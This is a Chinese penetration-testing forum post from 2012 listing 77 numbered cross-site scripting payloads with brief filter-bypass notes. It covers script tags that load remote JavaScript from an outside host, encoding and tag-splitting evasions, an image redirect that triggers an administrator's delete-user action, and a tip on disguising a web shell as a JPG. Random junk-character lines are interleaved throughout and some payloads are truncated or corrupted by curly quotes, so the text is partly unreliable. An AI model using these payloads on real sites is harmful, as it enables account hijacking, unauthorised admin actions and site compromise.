中国网络渗透测试联盟
标题:
xss详细利用大全1
[打印本页]
作者:
admin
时间:
2012-9-13 17:04
标题:
xss详细利用大全1
跨站图片shell
$ A7 ?3 d! j6 }& q, M3 W5 O7 U. x
XSS跨站代码 <script>alert("")</script>
, c% w) A# \( `0 K
2 T) w( e( a/ E7 V0 X5 v# E9 @/ f% X
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马
! r9 o1 }$ S( e
9 w* [7 }8 v3 U6 m! A
' T* u, e5 z& h3 T% G* V
+ p! ^9 Y5 j/ @3 q
1)普通的XSS JavaScript注入
- U6 K) x. M6 S% M2 g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ m% V" X* Z% ^+ W" y
6 B. M O! c/ J. y5 C$ G3 ?
(2)IMG标签XSS使用JavaScript命令
e: E9 o1 U% R) D H
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" f3 W' t! O0 ?% i
. k( s1 V$ r3 {# \
(3)IMG标签无分号无引号
+ `/ ]& D6 ^0 y+ ]' r/ ?
<IMG SRC=javascript:alert(‘XSS’)>
" x. n8 E5 a, D% w$ T
9 J' F. T/ U0 @5 I2 } ~
(4)IMG标签大小写不敏感
3 K( s$ p/ w; X1 H N6 {- e
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 {6 d3 S/ o& V
' B( K; v: l0 d7 ?- j# _% S: M, s
(5)HTML编码(必须有分号)
; i* V$ N- L* I' A
<IMG SRC=javascript:alert(“XSS”)>
' a3 K; h' N+ G" s
( m: u- `: V# |6 v/ D* J" S
(6)修正缺陷IMG标签
6 u% g9 P: x' h4 ~& D/ ~
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 e# a `+ z% X) u6 Z5 j
6 W* j% G0 C4 T# ~0 G- c# g1 z
(7)formCharCode标签(计算器)
/ i) T+ A% W% o; o9 r9 S
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
- E3 D( f' `# h
& a4 |* P5 C+ a2 k9 }
(8)UTF-8的Unicode编码(计算器)
. K# \4 X1 O) j" e4 X* @! |
<IMG SRC=jav..省略..S')>
8 ?- a8 J% o* i0 [: C- u. B! m
- j. o% L! G. l( f/ Y) D
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
8 r7 X" {7 c! d4 }1 C9 w
<IMG SRC=jav..省略..S')>
6 l8 `$ B" f' y2 }1 Z* |' T
: x+ Q* c& v( n# i! q# M" w. p
(10)十六进制编码也是没有分号(计算器)
- H% Q! p% {: v, X1 W
<IMG SRC=java..省略..XSS')>
9 d- [' \$ s& w6 x' `
4 E6 F7 C0 [6 G
(11)嵌入式标签,将Javascript分开
5 d1 K$ d2 C) i4 [
<IMG SRC=”jav ascript:alert(‘XSS’);”>
4 e' m9 P: \6 c+ k
' X; s( Z5 q+ v5 J8 x: F, q
(12)嵌入式编码标签,将Javascript分开
+ l! |6 ^1 l1 _8 ^( w
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% y( h7 Z5 C5 c! G1 D/ s
9 J' s; G- [+ D4 Q O& r6 ~
(13)嵌入式换行符
3 u' J: a' B9 d. W( `
<IMG SRC=”jav ascript:alert(‘XSS’);”>
; z# ^$ L, [1 r% i. `4 ^; V
/ E" N8 X( e3 w/ t' r
(14)嵌入式回车
( B" X$ S) v- Q' q
<IMG SRC=”jav ascript:alert(‘XSS’);”>
% q: _& O2 W3 m3 }
! C- j' V$ Z# l$ B7 S G
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
6 j2 I1 f2 ?0 X
<IMG SRC=”javascript:alert(‘XSS‘)”>
: X' g3 z' \5 W
5 S; g& u! N+ g' F. W% A
(16)解决限制字符(要求同页面)
3 P: X+ y1 W7 W. p8 a
<script>z=’document.’</script>
- h) V5 v4 {# y2 y
<script>z=z+’write(“‘</script>
' ^3 E6 z# O W! x
<script>z=z+’<script’</script>
0 s" E: g- ?1 [; W
<script>z=z+’ src=ht’</script>
, f3 O2 n" S& q, Z
<script>z=z+’tp://ww’</script>
# S2 y1 O3 a& \8 V( l2 |
<script>z=z+’w.shell’</script>
; u3 H' E; F- i0 T$ ]
<script>z=z+’.net/1.’</script>
" b/ i" f I+ T+ q# M
<script>z=z+’js></sc’</script>
1 a% G+ c! O j
<script>z=z+’ript>”)’</script>
: P8 u" _: X+ g; |2 r
<script>eval_r(z)</script>
1 J5 I8 y( Z7 d: M) ~
+ f+ }6 ]1 S+ n$ w3 r/ W; x0 n+ J
(17)空字符
& w: U# p) i5 t7 ]( n
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 K5 ^' v8 M3 u9 x5 ?
6 ]0 s. H) ~, M5 S, m
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
2 j% N& r3 \8 w8 R5 h8 @
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ A8 l5 {7 c" u1 X
0 l- \9 k% W4 A; I1 ~
(19)Spaces和meta前的IMG标签
6 f" t# p! g w) D& U( h
<IMG SRC=” javascript:alert(‘XSS’);”>
3 t! Z4 n$ N$ B: \
, O+ R$ D+ ?0 K& r
(20)Non-alpha-non-digit XSS
$ Z i4 z N5 ~; l
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
, x' z- w4 O( J5 c2 m# w
* E# z [1 h, x- T/ X
(21)Non-alpha-non-digit XSS to 2
: i( W0 i3 M1 e
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
' s- ?4 x/ l; u6 v+ k5 N
) s0 B% V4 ~" b( Y" J
(22)Non-alpha-non-digit XSS to 3
( h* T" u ~) M9 n, S
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
3 R+ i" N6 |& E- V) K: C
( V2 B0 I# h, O7 b# h
(23)双开括号
+ \+ A4 p" M8 o7 w0 M+ ]
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
: ?: |9 f% M. ^* Z) Z
4 i- `4 M# r5 L8 ~ m9 F
(24)无结束脚本标记(仅火狐等浏览器)
: E$ g$ T" U& G
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
; z& h( Z o) _; v( {
+ g1 d5 _" p- a% X8 |4 b, i
(25)无结束脚本标记2
4 v( {6 H& Z0 k5 d
<SCRIPT SRC=//3w.org/XSS/xss.js>
6 f" |, [7 T" n9 V5 w, F. _4 E; X. e
; V+ r1 e8 W& n) F/ M- O
(26)半开的HTML/JavaScript XSS
5 V( q" b; q* \2 F8 Y; h6 x$ |; C! v
<IMG SRC=”javascript:alert(‘XSS’)”
- K( n8 [; N+ g8 O, f1 v
) A7 \+ @7 q7 M
(27)双开角括号
$ `: k$ [: J+ x, p9 H( J7 |: ^
<iframe src=http://3w.org/XSS.html <
4 U# \+ j3 x8 Q
3 W/ ^6 j6 b% ~4 N. B5 I7 f
(28)无单引号 双引号 分号
5 O+ |+ q! W A1 z) t* a8 u# v
<SCRIPT>a=/XSS/
+ z/ ~1 c( I( L8 [' n
alert(a.source)</SCRIPT>
8 t6 }- R) }7 s( r! a7 |
- l+ }; ^2 v5 S1 F& a
(29)换码过滤的JavaScript
/ z. z* k; v j* m3 e. Z
\”;alert(‘XSS’);//
6 u6 i) g5 r7 t2 [
# Z; ]1 Q; Q% q. [0 R0 u' v
(30)结束Title标签
# I# a3 P8 _2 {8 ~+ i. \# o+ ]/ |' G$ A
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
2 m5 p: h3 i, M+ g# Q/ C! w" Q
! j* q+ C% }) }) K- p$ h
(31)Input Image
: Y' A9 I; x K1 [# m* _
<INPUT SRC=”javascript:alert(‘XSS’);”>
v6 G' B3 w$ f3 y/ ?
" H: W3 u5 P; J d
(32)BODY Image
C9 L2 U' o! U
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
4 Y& `& f% r& @8 _
; M0 ]2 S6 j2 t: ^: q3 V2 s4 p' N& w9 A
(33)BODY标签
9 ~, S f: L$ y
<BODY(‘XSS’)>
/ a# l# A* E4 ^( Q% l
" o% C t9 x7 G. ]& A8 g
(34)IMG Dynsrc
% B- h& s* L3 F* N2 c0 g& v
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
6 w' p9 o, l9 T: W
( A' E. q7 f: s" C( g& I2 \$ |
(35)IMG Lowsrc
" o1 E2 A5 ^1 a _4 a
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
: `+ D; q9 X- R+ q* M0 i: t
) d9 g( F1 U) I) ~
(36)BGSOUND
/ j+ `; m8 R& z8 y- L
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
+ d9 b4 h7 O8 k" K/ ?8 g
1 [4 L+ ^# H9 \% I
(37)STYLE sheet
$ i3 N% r4 g/ h& v& i J
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
) Z+ ` Z) {$ u9 W- s% S+ O
6 T7 v9 W! W2 l3 V& q" j
(38)远程样式表
5 P) N, F& w* G
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
& E+ l* w6 y8 j J4 L. q
" ~ j' \% ?2 M2 I% ~: [' E
(39)List-style-image(列表式)
0 W3 B4 ^% C: M, f0 Q: H2 Z
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
% ]' f" r0 \& k& j" S( q
2 W6 g8 _* e5 _4 J6 m0 z: F
(40)IMG VBscript
! O A$ W1 \: v6 H: s8 ], j
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
. A0 b( i3 E7 @* \3 J) r: v
: Y( w2 `8 i" e! Y% C5 m) u
(41)META链接url
; J) B$ ^9 S h
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
* u' m) u5 U: L" j0 y
. z# L# i! M" R4 T; A! p
(42)Iframe
& p* `" C; Q8 Y* `" C
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
J9 }3 f7 o5 L1 ^4 }" h s
(43)Frame
. h: q6 a6 q: Z' \
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
# a+ x+ m4 s1 t+ q, H
: H M; Q! M, n) H+ v! Z
(44)Table
4 S. a9 B& [5 o9 l z$ k; b( n
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
! N+ z* U1 _$ }& S- n' C1 O
* I, @' d' N' z! g% R* q+ R+ n
(45)TD
. a/ P' B! J9 O2 v
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
. b% C" N |7 k6 I) ~% ^6 D
. \5 p4 B2 U9 G5 x3 V8 v
(46)DIV background-image
( N' w2 w8 h, F
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& d5 L' z, m1 L. b( K6 b* ^' a
0 I( |3 J$ L$ \- | e( { p$ E6 \
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
9 `+ k, d9 ]) r2 J& d/ p
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
; E# y$ ?2 B( Z8 C
6 V5 w# ^0 i; N0 }; V
(48)DIV expression
6 T2 Y& P t+ J" _2 v6 `
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
% ` ?- E6 E& g4 i! I" w( [+ Q
' u; y$ X, I& B; a: Q" c
(49)STYLE属性分拆表达
; e3 i3 @: V, a( U" g# Z
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
# [" {) }; i, Q9 i
% L, `5 t' j5 N
(50)匿名STYLE(组成:开角号和一个字母开头)
W% v4 j1 A$ F+ f, M9 W- a
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
4 I! C( `, O+ ^
I. [9 q, w* j: |) y3 A- n
(51)STYLE background-image
- C& x$ R- B9 B; t3 l' G
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
. H( D4 Y$ f3 K
1 n. c8 l. L0 \1 s) Z# l9 s+ a
(52)IMG STYLE方式
& S2 O( G$ x4 ]2 S7 X& f Q
exppression(alert(“XSS”))’>
0 O; |" B+ F2 L# |, c, B* R; m
i( N$ G7 n6 `3 S2 x* k
(53)STYLE background
8 ~( l5 g$ O4 {7 }
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
. c% E$ g& b. u! D3 o
% x/ V9 `. S7 \! _: c1 D1 n; o
(54)BASE
4 l) y6 I0 H; ]/ d M
<BASE HREF=”javascript:alert(‘XSS’);//”>
$ t! s, h4 F% Z% b" ?8 f8 o: z
+ N; b: Z* O! z8 U4 p1 p5 K
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
9 i6 G& \: C( W1 f
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
5 {0 ?+ S9 Z6 }$ @) D
1 ?, l8 C3 g/ M8 |
(56)在flash中使用ActionScrpt可以混进你XSS的代码
8 S$ t+ S6 V H( A c
a=”get”;
1 D/ V* _( D+ k+ h) X! x
b=”URL(\”";
O" M! G( A% S s7 n% F
c=”javascript:”;
: T Y$ I! F% X% ]! J
d=”alert(‘XSS’);\”)”;
8 h* `* n. Z; ?, p
eval_r(a+b+c+d);
: H, W" E/ I* ~- q, `# K
. ], p: _( ^% t
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
( `, O% `; C- O
<HTML xmlns:xss>
, c$ ]6 i; q0 H5 y, e: t; L
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
! \7 T9 {9 z! C
<xss:xss>XSS</xss:xss>
6 D( I* s2 @ |7 n( B9 L. J8 X5 r
</HTML>
1 e9 w) q1 p7 e; L" |! B
% f/ H2 U( x2 }. f/ M! J8 g
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
- G5 F2 K5 F7 E% k
<SCRIPT SRC=””></SCRIPT>
: `4 O" n' { N: ~; u: z
7 u, D! E$ ^- O+ o) \9 k* p1 O: X" Q
(59)IMG嵌入式命令,可执行任意命令
2 Y9 R% [$ o. l, d$ k$ ^
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
+ e, X8 I {$ U% v" F3 v3 H$ V
: w7 Z- j! w7 ?# d5 e( g2 Y
(60)IMG嵌入式命令(a.jpg在同服务器)
' F' L$ S: x0 f
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
: O* R9 ?: ^& l! M! E. T; k
# e% I7 w3 |. W, [. [3 S
(61)绕符号过滤
2 f! @0 F' _0 h1 s
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
' L. p O; c0 s t i
4 o: ]6 L/ F' j, T9 N
(62)
, e4 W P, L' _3 K. `: F0 B( z
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
+ q. {: V8 u7 c- D
8 c8 D( d5 U$ l1 g( }3 E2 L5 [* C
(63)
0 c6 ~/ o6 b* {+ e
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
' h7 P2 r6 L. X( [9 V
8 U I" N, o" R3 e/ A4 U
(64)
6 S! h7 w/ G7 A/ J# M F
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
" x3 |! s1 q, o$ C$ L# @
- T: `. h" M6 E8 i' t& ]! r8 ^, F
(65)
. ~+ d( C: T/ q1 o
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
8 ^ ]) {$ ?% `) p, b7 e+ q+ t
" \/ ]; |* t! p: l9 s/ D
(66)
- f0 e' [ g; @! }& G
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
3 f3 g* e J) I" ~' Z
' q- S4 f1 E7 l/ x' E
(67)
/ u4 N: k) O7 D! u q
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”></SCRIPT>
% F$ Z. J6 U- ~8 k+ e
- Q2 E/ Z/ W7 {- e5 ^! S/ Z3 q2 y: n* |
(68)URL绕行
/ {/ X1 }: X( ~9 m
<A HREF=”
http://127.0.0.1/
”>XSS</A>
- s) m, U7 V$ t2 A! ~
) ] }3 R& e; L" J/ Y; h) M
(69)URL编码
, u. v& n, E8 s1 a
<A HREF=”
http://3w.org
”>XSS</A>
. W2 w( a5 n& R# ]
& Y+ _% ?& ^" d
(70)IP十进制
9 {% E! Y8 J% H2 U5 Y
<A HREF=”http://3232235521″>XSS</A>
/ F! m' c; n; O0 `1 Z1 Q5 ^- Z c
2 S0 h# D& L* a9 w! N! S- I5 f, B
(71)IP十六进制
$ ~2 V2 |! Q. M7 H
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
% ^; L9 y$ K8 M0 |+ l0 _: R
( X1 Y- H! j( ^
(72)IP八进制
. h7 Y T3 ]/ E' K# Y# v
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
& J' `7 {6 l- I" n3 r' n
& ?* @7 C. f+ D0 a0 D- j8 c
(73)混合编码
( T5 [1 \) b" T& V8 s( _
<A HREF=”h
. x+ ~" f4 X# q% _8 |, ~
tt p://6 6.000146.0×7.147/”">XSS</A>
0 l3 Y, q% w' F
: s, \( X# p1 y- e+ r5 ~. s
(74)节省[http:]
3 X6 [5 j K6 @& n
<A HREF=”//www.google.com/”>XSS</A>
9 H0 S4 k4 n4 }2 B2 Z) O
" F0 x% T }# z; [
(75)节省[www]
' C" O/ ~$ @, d: c
<A HREF=”
http://google.com/
”>XSS</A>
0 _2 |5 |8 @2 `0 ]7 ?/ H
9 H, S5 L& U. N4 L
(76)绝对点绝对DNS
" D, S! X( |! h8 h+ r+ A
<A HREF=”
http://www.google.com./
”>XSS</A>
7 t z S- F/ D" v
- M* h- V: p. v4 `8 |6 Q& [3 t
(77)javascript链接
7 f4 ]2 |, {( y" l8 _& n1 T
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
: M# D* e/ [& E3 i! L9 q
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2